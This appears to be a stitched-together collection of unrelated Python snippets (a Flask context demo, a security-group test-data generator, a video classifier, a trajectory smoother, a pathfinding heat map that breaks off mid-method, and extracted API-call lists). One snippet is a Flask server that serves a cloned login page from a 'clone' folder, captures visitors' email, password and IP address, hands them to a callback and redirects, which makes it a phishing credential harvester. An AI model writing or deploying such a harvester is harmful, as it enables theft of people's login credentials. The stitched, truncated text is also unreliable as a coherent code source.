"time.time... | [((2677, 2772), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'batch_size': 'batch_size', 'shuffle': '(False)', 'drop_last': '(False)'}), '(dataset, batch_size=batch_size, shuffle=False,\n drop_last=False)\n', (2704, 2772), False, 'import torch\n'), ((2785, 2807), 'numpy.empty', 'np.empty', (['(size, dims)'], {}), '((size, dims))\n', (2793, 2807), True, 'import numpy as np\n'), ((4443, 4461), 'numpy.atleast_1d', 'np.atleast_1d', (['mu1'], {}), '(mu1)\n', (4456, 4461), True, 'import numpy as np\n'), ((4472, 4490), 'numpy.atleast_1d', 'np.atleast_1d', (['mu2'], {}), '(mu2)\n', (4485, 4490), True, 'import numpy as np\n'), ((4505, 4526), 'numpy.atleast_2d', 'np.atleast_2d', (['sigma1'], {}), '(sigma1)\n', (4518, 4526), True, 'import numpy as np\n'), ((4540, 4561), 'numpy.atleast_2d', 'np.atleast_2d', (['sigma2'], {}), '(sigma2)\n', (4553, 4561), True, 'import numpy as np\n'), ((4832, 4843), 'time.time', 'time.time', ([], {}), '()\n', (4841, 4843), False, 'import time\n'), ((5346, 5370), 'numpy.iscomplexobj', 'np.iscomplexobj', (['covmean'], {}), '(covmean)\n', (5361, 5370), True, 'import numpy as np\n'), ((5656, 5673), 'numpy.trace', 'np.trace', (['covmean'], {}), '(covmean)\n', (5664, 5673), True, 'import numpy as np\n'), ((5943, 5963), 'numpy.mean', 'np.mean', (['act'], {'axis': '(0)'}), '(act, axis=0)\n', (5950, 5963), True, 'import numpy as np\n'), ((5976, 6001), 'numpy.cov', 'np.cov', (['act'], {'rowvar': '(False)'}), '(act, rowvar=False)\n', (5982, 6001), True, 'import numpy as np\n'), ((5913, 5932), 'util.tools.device_name', 'tools.device_name', ([], {}), '()\n', (5930, 5932), False, 'from util import tools\n'), ((2911, 2946), 'torch.cat', 'torch.cat', (['(batch, batch, batch)', '(1)'], {}), '((batch, batch, batch), 1)\n', (2920, 2946), False, 'import torch\n'), ((2993, 3008), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3006, 3008), False, 'import torch\n'), ((3265, 3310), 
'torch.nn.functional.adaptive_avg_pool2d', 'adaptive_avg_pool2d', (['pred'], {'output_size': '(1, 1)'}), '(pred, output_size=(1, 1))\n', (3284, 3310), False, 'from torch.nn.functional import adaptive_avg_pool2d\n'), ((5177, 5200), 'numpy.eye', 'np.eye', (['sigma1.shape[0]'], {}), '(sigma1.shape[0])\n', (5183, 5200), True, 'import numpy as np\n'), ((5721, 5737), 'numpy.trace', 'np.trace', (['sigma2'], {}), '(sigma2)\n', (5729, 5737), True, 'import numpy as np\n'), ((4951, 4962), 'time.time', 'time.time', ([], {}), '()\n', (4960, 4962), False, 'import time\n'), ((4989, 5009), 'numpy.isfinite', 'np.isfinite', (['covmean'], {}), '(covmean)\n', (5000, 5009), True, 'import numpy as np\n'), ((5464, 5484), 'numpy.abs', 'np.abs', (['covmean.imag'], {}), '(covmean.imag)\n', (5470, 5484), True, 'import numpy as np\n'), ((5702, 5718), 'numpy.trace', 'np.trace', (['sigma1'], {}), '(sigma1)\n', (5710, 5718), True, 'import numpy as np\n'), ((5399, 5419), 'numpy.diagonal', 'np.diagonal', (['covmean'], {}), '(covmean)\n', (5410, 5419), True, 'import numpy as np\n')] |
from flask import Flask, current_app, request, Request
# Minimal demo of pushing/popping a Flask application context so that the
# `current_app` proxy resolves to `app` between push() and pop().
app = Flask(__name__)
ctx = app.app_context()
ctx.push()
# NOTE(review): 'static_floder' is a typo for 'static_folder' -- this line
# only sets an unused attribute on the app; the real static folder is not
# changed.
current_app.static_floder = 'static'
ctx.pop()
# NOTE(review): bare attribute reference -- without parentheses app.run is
# never called, so no server starts (fixing it would block here).
app.run
| [
"flask.Flask"
] | [((62, 77), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (67, 77), False, 'from flask import Flask, current_app, request, Request\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
#
from __future__ import unicode_literals
from builtins import str
from builtins import range
import logging
from netaddr import IPNetwork
from random import randint, choice
import uuid
from .resource import Resource
from ..utils import timeit
logger = logging.getLogger(__name__)
class SecurityGroup(Resource):
    """Bulk generator of security-group records plus their derived ACLs.

    Creates one 'default' security group per project and
    *amount_per_project* extra groups, each backed by a ZooKeeper id-
    allocation node and two access-control-list children (ingress and
    egress) compiled from the group's policy rules.
    """
    # ZooKeeper path under which allocated security-group ids are recorded.
    _SG_ID_ALLOC_PATH = '/id/security-groups/id/'
    _SG_ID_PADDING = 100000
    _SG_ID_ALLOC_START_IDX = 8000000 + _SG_ID_PADDING
    def __init__(self, db_manager, batch_size, zk_client, project_amount,
                 amount_per_project):
        """Initialize the resource generator and reset the local id counter."""
        super(SecurityGroup, self).__init__(db_manager, batch_size, zk_client,
                                            project_amount, amount_per_project)
        # Monotonic offset added to both the security_group_id and the
        # zero-padded ZooKeeper node name.
        self._sg_id_allocator = 0
    @property
    def type(self):
        """Resource type string used by the framework."""
        return 'security-group'
    @property
    def total_amount(self):
        """Total records created: every SG plus two ACLs per SG."""
        total_sg = (self._project_amount + self._amount_per_project *
                    self._project_amount)
        total_acl = total_sg * 2
        return total_sg + total_acl
    @timeit(return_time_elapsed=True)
    def create_resources(self, rules_per_sg):
        """Create all security groups, then their ingress/egress ACLs.

        *rules_per_sg* controls how many random TCP/UDP rules each
        non-default group receives.  Returns nothing; the @timeit
        decorator reports the elapsed time.
        """
        sgs = []
        # Phase 1: write the security groups in batched Cassandra mutations.
        with self._uuid_cf.batch(queue_size=self._batch_size) as uuid_batch,\
                self._fqname_cf.batch(queue_size=self._batch_size) as \
                fqname_batch:
            for project_idx in range(self._project_amount):
                # Each project gets a 'default' SG with the canonical
                # allow-same-group ingress + allow-all egress rules.
                fq_name = [
                    'default-domain',
                    'project-%d' % project_idx,
                    'default',
                ]
                attr = {
                    'parent_type': 'project',
                    'security_group_id': self._SG_ID_ALLOC_START_IDX +
                                         self._sg_id_allocator,
                    'security_group_entries': {
                        'policy_rule': [
                            self._get_rule(remote_sg=':'.join(fq_name)),
                            self._get_rule(ethertype='IPv6',
                                           remote_sg=':'.join(fq_name)),
                            self._get_rule(direction='egress',
                                           ethertype='IPv4',
                                           remote_ip='0.0.0.0/0'),
                            self._get_rule(direction='egress',
                                           ethertype='IPv6',
                                           remote_ip='::/0'),
                        ],
                    },
                }
                # Mirror the allocation in ZooKeeper as a zero-padded node.
                id_str = "%(#)010d" % {'#': self._SG_ID_PADDING +
                                       self._sg_id_allocator}
                self._zk_client.create_node(self._SG_ID_ALLOC_PATH + id_str)
                sgs.append(self._create_resource('security_group',
                                                 fq_name, attr, uuid_batch,
                                                 fqname_batch))
                self._sg_id_allocator += 1
                for resource_idx in range(self._amount_per_project):
                    fq_name = [
                        'default-domain',
                        'project-%d' % project_idx,
                        'security-group-%d' % resource_idx,
                    ]
                    policy_rule = []
                    for _ in range(rules_per_sg):
                        # Random single-port ingress rule, TCP or UDP.
                        random_port = randint(0, 65535)
                        policy_rule.append(
                            self._get_rule(
                                protocol=choice(['udp', 'tcp']),
                                remote_ip='0.0.0.0/0',
                                dst_ports=(random_port, random_port)
                            )
                        )
                    attr = {
                        'parent_type': 'project',
                        'security_group_id': self._SG_ID_ALLOC_START_IDX +
                                             self._sg_id_allocator,
                        'security_group_entries': {
                            'policy_rule': policy_rule,
                        },
                    }
                    id_str = "%(#)010d" % {'#': self._SG_ID_PADDING +
                                           self._sg_id_allocator}
                    self._zk_client.create_node(self._SG_ID_ALLOC_PATH +
                                                id_str)
                    sgs.append(self._create_resource('security_group',
                                                     fq_name, attr, uuid_batch,
                                                     fqname_batch))
                    self._sg_id_allocator += 1
        # Phase 2: derive and write one ingress and one egress ACL per SG.
        with self._uuid_cf.batch(queue_size=self._batch_size) as uuid_batch,\
                self._fqname_cf.batch(queue_size=self._batch_size) as \
                fqname_batch:
            for sg in sgs:
                ingress, egress = self._policy_rule_to_acl_rule(
                    sg['security_group_id'],
                    sg['security_group_entries']['policy_rule'])
                fq_name = sg['fq_name'] + ['ingress-access-control-list']
                attr = {
                    'parent_type': 'security-group',
                    'access_control_list_entries': {
                        'dynamic': None,
                        'acl_rule': ingress,
                    },
                }
                self._create_resource('access_control_list', fq_name, attr,
                                      uuid_batch, fqname_batch)
                fq_name = sg['fq_name'] + ['egress-access-control-list']
                attr = {
                    'parent_type': 'security-group',
                    'access_control_list_entries': {
                        'dynamic': None,
                        'acl_rule': egress,
                    },
                }
                self._create_resource('access_control_list', fq_name, attr,
                                      uuid_batch, fqname_batch)
    def _policy_rule_to_acl_rule(self, sg_id, prules):
        """Compile policy rules into ACL rules, split by direction.

        A rule whose source carries a security group or a subnet is
        classified as ingress; everything else as egress.  Returns the
        tuple (ingress_rules, egress_rules).
        """
        ingress = []
        egress = []
        for prule in prules:
            # Resolve the symbolic security-group references to the SG's
            # numeric id (or None when the side has no SG reference).
            if prule['src_addresses'][0]['security_group']:
                src_sg = sg_id
            else:
                src_sg = None
            if prule['dst_addresses'][0]['security_group']:
                dst_sg = sg_id
            else:
                dst_sg = None
            arule = {
                'rule_uuid': prule['rule_uuid'],
                'match_condition': {
                    'ethertype': prule['ethertype'],
                    'src_address': {
                        'security_group': src_sg,
                        'subnet': prule['src_addresses'][0]['subnet'],
                        'virtual_network': None,
                        'subnet_list': [],
                        'network_policy': None,
                    },
                    'dst_address': {
                        'security_group': dst_sg,
                        'subnet': prule['dst_addresses'][0]['subnet'],
                        'virtual_network': None,
                        'subnet_list': [],
                        'network_policy': None,
                    },
                    'protocol': prule['protocol'],
                    'src_port': prule['src_ports'][0],
                    'dst_port': prule['dst_ports'][0],
                },
                'action_list': {
                    'gateway_name': None,
                    'log': False,
                    'alert': False,
                    'assign_routing_instance': None,
                    'mirror_to': None,
                    'simple_action': 'pass',
                    'apply_service': [],
                },
            }
            if (arule['match_condition']['src_address']['security_group'] or
                    arule['match_condition']['src_address']['subnet']):
                ingress.append(arule)
            else:
                egress.append(arule)
        return (ingress, egress)
    def _get_rule(self, direction='ingress', ethertype='IPv4', protocol='any',
                  remote_sg=None, remote_ip=None, src_ports=(0, 65535),
                  dst_ports=(0, 65535)):
        """Build a single policy-rule dict with a fresh rule_uuid.

        The remote endpoint (SG name or CIDR) lands on the source side for
        ingress rules and on the destination side for egress rules; the
        opposite side is the 'local' group.
        """
        if remote_ip:
            ip = IPNetwork(remote_ip)
            remote_ip_map = {
                'ip_prefix': str(ip.ip),
                'ip_prefix_len': ip.prefixlen
            }
        else:
            remote_ip_map = None
        return {
            'rule_uuid': str(uuid.uuid4()),
            'direction': '>',
            'ethertype': ethertype,
            'protocol': protocol,
            'action_list': None,
            'application': [],
            'rule_sequence': None,
            'src_addresses': [{
                'security_group':
                    remote_sg if direction == 'ingress' else 'local',
                'subnet': remote_ip_map if direction == 'ingress' else None,
                'virtual_network': None,
                'subnet_list': [],
                'network_policy': None,
            }],
            'dst_addresses': [{
                'security_group':
                    remote_sg if direction == 'egress' else 'local',
                'subnet': remote_ip_map if direction == 'egress' else None,
                'virtual_network': None,
                'subnet_list': [],
                'network_policy': None,
            }],
            'src_ports': [{
                'start_port': src_ports[0],
                'end_port': src_ports[1],
            }],
            'dst_ports': [{
                'start_port': dst_ports[0],
                'end_port': dst_ports[1],
            }],
        }
| [
"logging.getLogger",
"random.choice",
"builtins.str",
"uuid.uuid4",
"builtins.range",
"random.randint",
"netaddr.IPNetwork"
] | [((347, 374), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (364, 374), False, 'import logging\n'), ((1451, 1478), 'builtins.range', 'range', (['self._project_amount'], {}), '(self._project_amount)\n', (1456, 1478), False, 'from builtins import range\n'), ((8244, 8264), 'netaddr.IPNetwork', 'IPNetwork', (['remote_ip'], {}), '(remote_ip)\n', (8253, 8264), False, 'from netaddr import IPNetwork\n'), ((3061, 3092), 'builtins.range', 'range', (['self._amount_per_project'], {}), '(self._amount_per_project)\n', (3066, 3092), False, 'from builtins import range\n'), ((8324, 8334), 'builtins.str', 'str', (['ip.ip'], {}), '(ip.ip)\n', (8327, 8334), False, 'from builtins import str\n'), ((8489, 8501), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (8499, 8501), False, 'import uuid\n'), ((3368, 3387), 'builtins.range', 'range', (['rules_per_sg'], {}), '(rules_per_sg)\n', (3373, 3387), False, 'from builtins import range\n'), ((3427, 3444), 'random.randint', 'randint', (['(0)', '(65535)'], {}), '(0, 65535)\n', (3434, 3444), False, 'from random import randint, choice\n'), ((3574, 3596), 'random.choice', 'choice', (["['udp', 'tcp']"], {}), "(['udp', 'tcp'])\n", (3580, 3596), False, 'from random import randint, choice\n')] |
import flask ; from flask import *
def Serve(email_form, password_form, rd, dic, host="0.0.0.0", port="8080"):
app = Flask(__name__, template_folder="../clone")
# login storage
class Login:
email = ""
pwd = ""
ip = ""
# forms
@app.get("/")
def index():
return render_template("index.html")
@app.post("/login")
def login():
Login.ip = request.remote_addr
Login.email = request.form.get(email_form)
Login.pwd = request.form.get(password_form)
ouputfunc = dic["func"]
res = dic["res"]
ouputfunc(res=res, Login=Login)
return flask.redirect(rd)
print("\n-= Flask Logs =-")
app.run(host=host, port=port) | [
"flask.redirect"
] | [((658, 676), 'flask.redirect', 'flask.redirect', (['rd'], {}), '(rd)\n', (672, 676), False, 'import flask\n')] |
import torch
import torch.nn as nn
import numpy as np
import cv2
import os
import shutil
from matplotlib import pyplot as plt
from Model_Definition import VC3D
from mypath import NICKNAME, DATA_DIR, PATH
# TODO: Now can display images with plt.show(), need to solve display on cloud instance
OUT_DIR = PATH + os.path.sep + 'Result'
DEMO_DIR = PATH + os.path.sep + 'Demo'
# %%
def check_folder_exist(folder_name):
    """Ensure *folder_name* exists and is empty, recreating it if present."""
    if os.path.exists(folder_name):
        shutil.rmtree(folder_name)
    os.makedirs(folder_name)
check_folder_exist(OUT_DIR)
# %%
def center_crop(frame):
    """Crop a frame to the fixed 120x120 window the classifier expects.

    Keeps rows 0:120 and columns 22:142 (all channels) and returns the
    crop as a uint8 array.
    """
    region = frame[:120, 22:142, :]
    return np.array(region).astype(np.uint8)
# %%
def main():
    """Run the 3D-conv action classifier over one video, writing an
    annotated result video (predicted label + probability per frame)."""
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    print("Device being used:", device)
    with open('ucf_9_labels.txt', 'r') as f:
        class_names = f.readlines()
        f.close()
    # init model
    model = VC3D()
    checkpoint = torch.load(f'model_{NICKNAME}.pt', map_location=device)
    model.load_state_dict(checkpoint)
    model.to(device)
    model.eval()
    # read video
    video_name = 'PlayingGuitar'
    video = DATA_DIR + os.path.sep + video_name + os.path.sep + 'v_' + video_name + '_g09_c04.avi'
    # video = DEMO_DIR + os.path.sep + video_name + '.mp4'
    cap = cv2.VideoCapture(video)
    retaining = True
    # Numeric indices are OpenCV CAP_PROP ids: 3=width, 4=height, 5=fps,
    # 6=fourcc, 7=frame count.
    fps = int(cap.get(5))
    size = (int(cap.get(3)),
            int(cap.get(4)))
    fourcc = int(cap.get(6))
    frames_num = cap.get(7)
    print('Video Readed, with fps %s, size %s and format %s' % (fps, size,
                                                                chr(fourcc & 0xFF) + chr((fourcc >> 8) & 0xFF) + chr(
                                                                    (fourcc >> 16) & 0xFF) + chr(
                                                                    (fourcc >> 24) & 0xFF)))
    # 1983148141 == 0x7634706D, the little-endian fourcc code for 'mp4v'.
    out = cv2.VideoWriter(os.path.join(OUT_DIR, video_name + '_result.mp4'), 1983148141, fps, size)
    clip = []
    count = 0
    while retaining:
        count += 1
        retaining, frame = cap.read()
        if not retaining and frame is None:
            continue
        # Resize to 171x128, crop to 120x120, subtract the per-channel
        # BGR mean used at training time.
        tmp_ = center_crop(cv2.resize(frame, (171, 128)))
        tmp = tmp_ - np.array([[[90.0, 98.0, 102.0]]])
        clip.append(tmp)
        # Classify a sliding window of 16 consecutive frames.
        if len(clip) == 16:
            inputs = np.array(clip).astype(np.float32)
            inputs = np.expand_dims(inputs, axis=0)
            # Reorder (batch, frames, H, W, C) -> (batch, C, frames, H, W).
            inputs = np.transpose(inputs, (0, 4, 1, 2, 3))
            inputs = torch.from_numpy(inputs)
            inputs = torch.autograd.Variable(inputs, requires_grad=False).to(device)
            with torch.no_grad():
                outputs = model.forward(inputs)
            probs = nn.Softmax(dim=1)(outputs)
            label = torch.max(probs, 1)[1].detach().cpu().numpy()[0]
            # Overlay the predicted class name and probability.
            cv2.putText(frame, class_names[label].split(' ')[-1].strip(), (20, 20),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.6,
                        (0, 0, 255), 1)
            cv2.putText(frame, "prob: %.4f" % probs[0][label], (20, 40),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.6,
                        (0, 0, 255), 1)
            out.write(frame)
            clip.pop(0)  # slide the window by one frame
        if count % 10 == 0:
            print(str(count / frames_num * 100) + '%')
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
        # cv2.imshow('result', frame)
        # cv2.waitKey(30)
        # plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
        # plt.title('result')
        # plt.show()
    out.release()
    cap.release()
    cv2.destroyAllWindows()
if __name__ == '__main__':
main() | [
"Model_Definition.VC3D",
"torch.max",
"torch.from_numpy",
"numpy.array",
"torch.cuda.is_available",
"cv2.destroyAllWindows",
"os.path.exists",
"torch.autograd.Variable",
"cv2.waitKey",
"cv2.putText",
"cv2.resize",
"numpy.transpose",
"os.makedirs",
"torch.nn.Softmax",
"torch.load",
"os.... | [((424, 451), 'os.path.exists', 'os.path.exists', (['folder_name'], {}), '(folder_name)\n', (438, 451), False, 'import os\n'), ((967, 973), 'Model_Definition.VC3D', 'VC3D', ([], {}), '()\n', (971, 973), False, 'from Model_Definition import VC3D\n'), ((991, 1046), 'torch.load', 'torch.load', (['f"""model_{NICKNAME}.pt"""'], {'map_location': 'device'}), "(f'model_{NICKNAME}.pt', map_location=device)\n", (1001, 1046), False, 'import torch\n'), ((1342, 1365), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video'], {}), '(video)\n', (1358, 1365), False, 'import cv2\n'), ((3628, 3651), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3649, 3651), False, 'import cv2\n'), ((461, 487), 'shutil.rmtree', 'shutil.rmtree', (['folder_name'], {}), '(folder_name)\n', (474, 487), False, 'import shutil\n'), ((496, 520), 'os.makedirs', 'os.makedirs', (['folder_name'], {}), '(folder_name)\n', (507, 520), False, 'import os\n'), ((539, 563), 'os.makedirs', 'os.makedirs', (['folder_name'], {}), '(folder_name)\n', (550, 563), False, 'import os\n'), ((1938, 1987), 'os.path.join', 'os.path.join', (['OUT_DIR', "(video_name + '_result.mp4')"], {}), "(OUT_DIR, video_name + '_result.mp4')\n", (1950, 1987), False, 'import os\n'), ((670, 685), 'numpy.array', 'np.array', (['frame'], {}), '(frame)\n', (678, 685), True, 'import numpy as np\n'), ((760, 785), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (783, 785), False, 'import torch\n'), ((2210, 2239), 'cv2.resize', 'cv2.resize', (['frame', '(171, 128)'], {}), '(frame, (171, 128))\n', (2220, 2239), False, 'import cv2\n'), ((2262, 2295), 'numpy.array', 'np.array', (['[[[90.0, 98.0, 102.0]]]'], {}), '([[[90.0, 98.0, 102.0]]])\n', (2270, 2295), True, 'import numpy as np\n'), ((2425, 2455), 'numpy.expand_dims', 'np.expand_dims', (['inputs'], {'axis': '(0)'}), '(inputs, axis=0)\n', (2439, 2455), True, 'import numpy as np\n'), ((2477, 2514), 'numpy.transpose', 'np.transpose', (['inputs', '(0, 4, 1, 2, 
3)'], {}), '(inputs, (0, 4, 1, 2, 3))\n', (2489, 2514), True, 'import numpy as np\n'), ((2536, 2560), 'torch.from_numpy', 'torch.from_numpy', (['inputs'], {}), '(inputs)\n', (2552, 2560), False, 'import torch\n'), ((3037, 3149), 'cv2.putText', 'cv2.putText', (['frame', "('prob: %.4f' % probs[0][label])", '(20, 40)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.6)', '(0, 0, 255)', '(1)'], {}), "(frame, 'prob: %.4f' % probs[0][label], (20, 40), cv2.\n FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1)\n", (3048, 3149), False, 'import cv2\n'), ((2663, 2678), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2676, 2678), False, 'import torch\n'), ((2749, 2766), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (2759, 2766), True, 'import torch.nn as nn\n'), ((2370, 2384), 'numpy.array', 'np.array', (['clip'], {}), '(clip)\n', (2378, 2384), True, 'import numpy as np\n'), ((2582, 2634), 'torch.autograd.Variable', 'torch.autograd.Variable', (['inputs'], {'requires_grad': '(False)'}), '(inputs, requires_grad=False)\n', (2605, 2634), False, 'import torch\n'), ((3352, 3366), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3363, 3366), False, 'import cv2\n'), ((2796, 2815), 'torch.max', 'torch.max', (['probs', '(1)'], {}), '(probs, 1)\n', (2805, 2815), False, 'import torch\n')] |
"""Transform signaling data to smoothed trajectories."""
import sys
import numpy
import pandas as pd
import geopandas as gpd
import shapely.geometry
import matplotlib.patches
import matplotlib.pyplot as plt
import mobilib.voronoi
SAMPLING = pd.Timedelta('00:01:00')
STD = pd.Timedelta('00:05:00')
def smoothen(array, std_quant):
return pd.Series(array).rolling(
int(numpy.ceil(8 * std_quant)),
min_periods=0,
center=True,
win_type='gaussian'
).mean(std=std_quant)
def trajectory(df, xcol, ycol, sampling, std):
ts = pd.date_range(df.index.min(), df.index.max(), freq=sampling)
obs_ind = ts.searchsorted(df.index)
xs_src = numpy.full(ts.size, numpy.nan)
xs_src[obs_ind] = df[xcol]
ys_src = numpy.full(ts.size, numpy.nan)
ys_src[obs_ind] = df[ycol]
std_quant = std / sampling
return smoothen(xs_src, std_quant), smoothen(ys_src, std_quant), ts
if __name__ == '__main__':
signals = pd.read_csv(sys.argv[1], sep=';')
signals = signals[signals['phone_nr'] == int(sys.argv[3])]
signals['pos_time'] = pd.to_datetime(signals['pos_time'])
timeweights = (1 / signals.groupby('pos_time')['phone_nr'].count()).reset_index().rename(columns={'phone_nr' : 'weight'})
signals = pd.merge(signals, timeweights, on='pos_time')
antennas = pd.read_csv(sys.argv[2], sep=';')
siglocs = pd.merge(signals, antennas, on='cell_name').groupby('pos_time').agg({
'xcent': 'mean',
'ycent': 'mean',
})
xpos, ypos, tpos = trajectory(siglocs, 'xcent', 'ycent', sampling=SAMPLING, std=STD)
plt.plot(xpos, ypos)
plt.scatter(antennas.xcent, antennas.ycent, s=9, color='orange')
plt.gca().set_aspect('equal')
plt.show()
pd.DataFrame({'x': xpos, 'y': ypos, 't': tpos}).to_csv(sys.argv[4], sep=';', index=False) | [
"pandas.Series",
"numpy.ceil",
"pandas.read_csv",
"matplotlib.pyplot.gca",
"pandas.Timedelta",
"pandas.merge",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"pandas.DataFrame",
"numpy.full",
"pandas.to_datetime",
"matplotlib.pyplot.show"
] | [((246, 270), 'pandas.Timedelta', 'pd.Timedelta', (['"""00:01:00"""'], {}), "('00:01:00')\n", (258, 270), True, 'import pandas as pd\n'), ((277, 301), 'pandas.Timedelta', 'pd.Timedelta', (['"""00:05:00"""'], {}), "('00:05:00')\n", (289, 301), True, 'import pandas as pd\n'), ((683, 713), 'numpy.full', 'numpy.full', (['ts.size', 'numpy.nan'], {}), '(ts.size, numpy.nan)\n', (693, 713), False, 'import numpy\n'), ((758, 788), 'numpy.full', 'numpy.full', (['ts.size', 'numpy.nan'], {}), '(ts.size, numpy.nan)\n', (768, 788), False, 'import numpy\n'), ((966, 999), 'pandas.read_csv', 'pd.read_csv', (['sys.argv[1]'], {'sep': '""";"""'}), "(sys.argv[1], sep=';')\n", (977, 999), True, 'import pandas as pd\n'), ((1089, 1124), 'pandas.to_datetime', 'pd.to_datetime', (["signals['pos_time']"], {}), "(signals['pos_time'])\n", (1103, 1124), True, 'import pandas as pd\n'), ((1265, 1310), 'pandas.merge', 'pd.merge', (['signals', 'timeweights'], {'on': '"""pos_time"""'}), "(signals, timeweights, on='pos_time')\n", (1273, 1310), True, 'import pandas as pd\n'), ((1326, 1359), 'pandas.read_csv', 'pd.read_csv', (['sys.argv[2]'], {'sep': '""";"""'}), "(sys.argv[2], sep=';')\n", (1337, 1359), True, 'import pandas as pd\n'), ((1594, 1614), 'matplotlib.pyplot.plot', 'plt.plot', (['xpos', 'ypos'], {}), '(xpos, ypos)\n', (1602, 1614), True, 'import matplotlib.pyplot as plt\n'), ((1619, 1683), 'matplotlib.pyplot.scatter', 'plt.scatter', (['antennas.xcent', 'antennas.ycent'], {'s': '(9)', 'color': '"""orange"""'}), "(antennas.xcent, antennas.ycent, s=9, color='orange')\n", (1630, 1683), True, 'import matplotlib.pyplot as plt\n'), ((1722, 1732), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1730, 1732), True, 'import matplotlib.pyplot as plt\n'), ((1688, 1697), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1695, 1697), True, 'import matplotlib.pyplot as plt\n'), ((1737, 1784), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': xpos, 'y': ypos, 't': tpos}"], {}), "({'x': xpos, 'y': 
ypos, 't': tpos})\n", (1749, 1784), True, 'import pandas as pd\n'), ((347, 363), 'pandas.Series', 'pd.Series', (['array'], {}), '(array)\n', (356, 363), True, 'import pandas as pd\n'), ((385, 410), 'numpy.ceil', 'numpy.ceil', (['(8 * std_quant)'], {}), '(8 * std_quant)\n', (395, 410), False, 'import numpy\n'), ((1374, 1417), 'pandas.merge', 'pd.merge', (['signals', 'antennas'], {'on': '"""cell_name"""'}), "(signals, antennas, on='cell_name')\n", (1382, 1417), True, 'import pandas as pd\n')] |
#!/usr/bin/env python
# -*- coding:utf8 -*-
import sys
import argparse
from lantis.webradio.commands import bind_subparsers
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
bind_subparsers(subparsers)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
args = parser.parse_args()
command = args.Command(args)
return command.run()
if __name__ == '__main__':
ret = main()
sys.exit(ret)
| [
"lantis.webradio.commands.bind_subparsers",
"argparse.ArgumentParser",
"sys.exit"
] | [((135, 160), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (158, 160), False, 'import argparse\n'), ((198, 225), 'lantis.webradio.commands.bind_subparsers', 'bind_subparsers', (['subparsers'], {}), '(subparsers)\n', (213, 225), False, 'from lantis.webradio.commands import bind_subparsers\n'), ((437, 450), 'sys.exit', 'sys.exit', (['ret'], {}), '(ret)\n', (445, 450), False, 'import sys\n')] |
# Pathfinding algorithm.
import pygame
import random
class HotTile( object ):
def __init__( self ):
self.heat = 9999
self.cost = 0
self.block = False
class HotMap( object ):
DELTA8 = [ (-1,-1), (0,-1), (1,-1), (-1,0), (1,0), (-1,1), (0,1), (1,1) ]
EXPENSIVE = 9999
def __init__( self, scene, hot_points, obstacles=set(), expensive=set(), limits=None, avoid_models=False ):
"""Calculate this hotmap given scene and set of hot points."""
# Obstacles block movement.
# Expensive tiles are avoided, if possible.
self.scene = scene
if avoid_models:
obstacles = self.list_model_positions().union( obstacles )
self.obstacles = obstacles
self.expensive = expensive
self.map = [[ int(self.EXPENSIVE)
for y in range(scene.height) ]
for x in range(scene.width) ]
for p in hot_points:
if len( p ) < 3:
self.map[p[0]][p[1]] = 0
else:
self.map[p[0]][p[1]] = min( p[2], self.map[p[0]][p[1]] )
if limits:
self.lo_x = max( limits.x, 1 )
self.hi_x = min( limits.x + limits.width + 1, scene.width - 1 )
self.lo_y = max( limits.y, 1 )
self.hi_y = min( limits.y + limits.height + 1, scene.height - 1 )
else:
self.lo_x,self.hi_x,self.lo_y,self.hi_y = 1, scene.width-1, 1, scene.height-1
self.process_map( limits )
def process_map( self, limits ):
# Iterate through each of the tiles,
flag = True
while flag:
flag = False
for y in range( self.lo_y, self.hi_y ):
for x in range( self.lo_x, self.hi_x ):
p = (x,y)
if not self.blocks_movement( x, y ):
dh = 2 + self.map[x-1][y]
dv = 2 + self.map[x][y-1]
dd = 3 + self.map[x-1][y-1]
dp = 3 + self.map[x+1][y-1]
dp = min(dh,dv,dd,dp)
if p in self.expensive:
dp += 16
if dp < self.map[x][y]:
self.map[x][y] = dp
flag = True
for y in range( self.hi_y-1, self.lo_y-1, -1 ):
for x in range( self.hi_x-1, self.lo_x-1, -1 ):
if not self.blocks_movement( x, y ):
dh = 2 + self.map[x+1][y]
dv = 2 + self.map[x][y+1]
dd = 3 + self.map[x+1][y+1]
dp = 3 + self.map[x-1][y+1]
dp = min(dh,dv,dd,dp)
if p in self.expensive:
dp += 16
if dp < self.map[x][y]:
self.map[x][y] = dp
flag = True
def blocks_movement( self, x, y ):
return self.scene.map[x][y].blocks_walking() or (x,y) in self.obstacles
def list_model_positions( self ):
mylist = set()
for m in self.scene.contents:
if self.scene.is_model(m):
mylist.add( m.pos )
return mylist
def downhill_dir( self, pos ):
"""Return a dx,dy tuple showing the lower heat value."""
best_d = None
random.shuffle( self.DELTA8 )
heat = self.map[pos[0]][pos[1]]
for d in self.DELTA8:
x2 = d[0] + pos[0]
y2 = d[1] + pos[1]
if self.scene.on_the_map(x2,y2) and ( self.map[x2][y2] < heat ):
heat = self.map[x2][y2]
best_d = d
return best_d
def clever_downhill_dir( self, exp, pos ):
